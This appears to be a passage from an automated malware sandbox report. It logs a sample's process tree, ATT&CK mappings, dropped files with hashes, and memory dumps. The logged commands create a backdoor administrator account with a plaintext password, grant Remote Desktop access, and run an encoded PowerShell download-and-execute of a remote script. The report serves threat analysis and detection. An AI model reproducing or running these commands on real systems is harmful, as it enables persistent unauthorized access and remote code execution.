  - Suspicious use of WriteProcessMemory
  PID:4668
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" FSHLRPTB$ /ADD
    3⤵
    PID:1620

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:4968
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  PID:1812
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:4236

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Knt1cdeB
1⤵
PID:4184
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Knt1cdeB
  2⤵
  PID:2388
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Knt1cdeB
    3⤵
    PID:4220

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:4152
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2328

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:4664
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  PID:4364

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:4592
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:1164
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4588

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Web Service

T1102

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESEA6.tmp

Filesize
1KB

MD5
e286b95834274734f1a24af06f14df17

SHA1
adfaaa50b1a16ad360814ed8d653b25bcfae4388

SHA256
5120b984dd0e2e6444982ed4019a6d0fc85cccb5a117bf3bf31d1564bd90031b

SHA512
a8373a06271c19d750a1734ab349aa41c53006e936cd24272f7fc58c0e60588fcf61d7300e7f07ca9c76b836b68adaa4c14ca2b7a0d565206f1dcdbf8de3d5d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1

Filesize
3.0MB

MD5
bcac3bbb18f093dbc8e5e76d2675695f

SHA1
96453f65b41e428937349e6f48fe67d6dfd6a580

SHA256
b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a

SHA512
78c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.zip

Filesize
2.3MB

MD5
42c2a160d2d191e6ffcc1076b4734ee2

SHA1
c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49

SHA256
2b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99

SHA512
3b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939

Download Submit
C:\Users\Admin\AppData\Local\Temp\mr1m5zub\mr1m5zub.dll

Filesize
3KB

MD5
346a7c477573d24784f95fa0b047d9cc

SHA1
861150dbca338428273317bbb53226ce8e43e994

SHA256
d50f21f0ea9f17e09ead248c550bfdcaab24c33cdcbdfd81452be3d03d4b3f7a

SHA512
1c48298b5c6ff83bb60a8bce22c8edc856b49e9b463d64e4188aa21c27d8dde69b28ec814a15ac49b0e52d466ff13731f0bfb9c166b3f787ff9ddbaf649f592c

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
55KB

MD5
f357d4e7b83bc0a41c65d97f3e6f50f4

SHA1
71db3180a8ada6d5d7722c54a5940c3490f78636

SHA256
db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba

SHA512
566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
944KB

MD5
d5de6f599d9807bac2f5a8e751a8c38f

SHA1
9e70edf56b6a5768fda84232e9c557e750d3631b

SHA256
18207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca

SHA512
e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mr1m5zub\CSCA214D68A58DB456FAC22B9DB53D564.TMP

Filesize
652B

MD5
d96d584c1a4d85ad6f7b01939ff622a6

SHA1
c03715ff6b0be297907a0f58af63e63ce851317a

SHA256
433da362b2dda35d9aa2f1def4cfc2498f26234911ab215a88805baad57c92f8

SHA512
79c0f21cefd61b98e7be5084f63eabe74e37e8c1d1a5cde7648a3033b5f1044901783666feda7dc12fe2f606e270466a32c9091d035a2cc6d97a6ac49b4b51dd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mr1m5zub\mr1m5zub.0.cs

Filesize
507B

MD5
6f235215132cdebacd0f793fe970d0e3

SHA1
2841e44c387ed3b6f293611992f1508fe9b55b89

SHA256
ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec

SHA512
a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mr1m5zub\mr1m5zub.cmdline

Filesize
369B

MD5
4bd77a46504cdccdc6f2a4880ab61a31

SHA1
1f65a504a32cc813f9d9b7a7268ac42e840fd40d

SHA256
87f0eeba7e3034d5cabadffd471fa3a8a7bc6f252c45055f55b6608cc46ce551

SHA512
9a0be17ae2156f93de38e7ffe79139937c4876e980ee631b218f9b1e775106062bd415c8a6f3e33844c237846020486a223740ecc51ab7c5c1d7deba6685660b

Download Submit
memory/760-159-0x0000000000000000-mapping.dmp

Download
memory/920-155-0x0000000000000000-mapping.dmp

Download
memory/1132-152-0x0000000000000000-mapping.dmp

Download
memory/1164-185-0x0000000000000000-mapping.dmp

Download
memory/1180-157-0x0000000000000000-mapping.dmp

Download
memory/1284-154-0x0000000000000000-mapping.dmp

Download
memory/1620-175-0x0000000000000000-mapping.dmp

Download
memory/1624-144-0x0000000000000000-mapping.dmp

Download
memory/1812-176-0x0000000000000000-mapping.dmp

Download
memory/2192-161-0x0000000000000000-mapping.dmp

Download
memory/2300-153-0x0000000000000000-mapping.dmp

Download
memory/2304-149-0x0000000000000000-mapping.dmp

Download
memory/2328-180-0x0000000000000000-mapping.dmp

Download
memory/2388-178-0x0000000000000000-mapping.dmp

Download
memory/2504-156-0x0000000000000000-mapping.dmp

Download
memory/2556-146-0x0000000000000000-mapping.dmp

Download
memory/2680-160-0x0000000000000000-mapping.dmp

Download
memory/2992-158-0x0000000000000000-mapping.dmp

Download
memory/3192-163-0x0000000000000000-mapping.dmp

Download
memory/3280-151-0x0000000000000000-mapping.dmp

Download
memory/3380-150-0x0000000000000000-mapping.dmp

Download
memory/3436-147-0x0000000000000000-mapping.dmp

Download
memory/3596-164-0x0000000000000000-mapping.dmp

Download
memory/3704-168-0x0000000000000000-mapping.dmp

Download
memory/3744-165-0x0000000000000000-mapping.dmp

Download
memory/3756-171-0x0000000000000000-mapping.dmp

Download
memory/3876-170-0x0000000000000000-mapping.dmp

Download
memory/4052-173-0x0000000000000000-mapping.dmp

Download
memory/4092-184-0x0000000000000000-mapping.dmp

Download
memory/4128-148-0x0000000000000000-mapping.dmp

Download
memory/4136-133-0x0000000000040000-0x0000000002268000-memory.dmp

Filesize
34.2MB

Download
memory/4136-131-0x00000000047C0000-0x0000000004C6C000-memory.dmp

Filesize
4.7MB

Download
memory/4136-130-0x000000000447B000-0x00000000047B8000-memory.dmp

Filesize
3.2MB

Download
memory/4220-179-0x0000000000000000-mapping.dmp

Download
memory/4236-177-0x0000000000000000-mapping.dmp

Download
memory/4364-181-0x0000000000000000-mapping.dmp

Download
memory/4588-187-0x00007FF847290000-0x00007FF847D51000-memory.dmp

Filesize
10.8MB

Download
memory/4588-186-0x0000000000000000-mapping.dmp

Download
memory/4628-140-0x0000000000000000-mapping.dmp

Download
memory/4668-174-0x0000000000000000-mapping.dmp

Download
memory/4712-132-0x0000000000000000-mapping.dmp

Download
memory/4712-134-0x0000021ECFAE0000-0x0000021ECFB02000-memory.dmp

Filesize
136KB

Download
memory/4712-136-0x00007FF847290000-0x00007FF847D51000-memory.dmp

Filesize
10.8MB

Download
memory/4732-183-0x0000000000000000-mapping.dmp

Download
memory/4744-137-0x0000000000000000-mapping.dmp

Download
memory/4828-162-0x0000000000000000-mapping.dmp

Download
memory/4980-172-0x0000000000000000-mapping.dmp

Download
memory/5004-169-0x0000000000000000-mapping.dmp

Download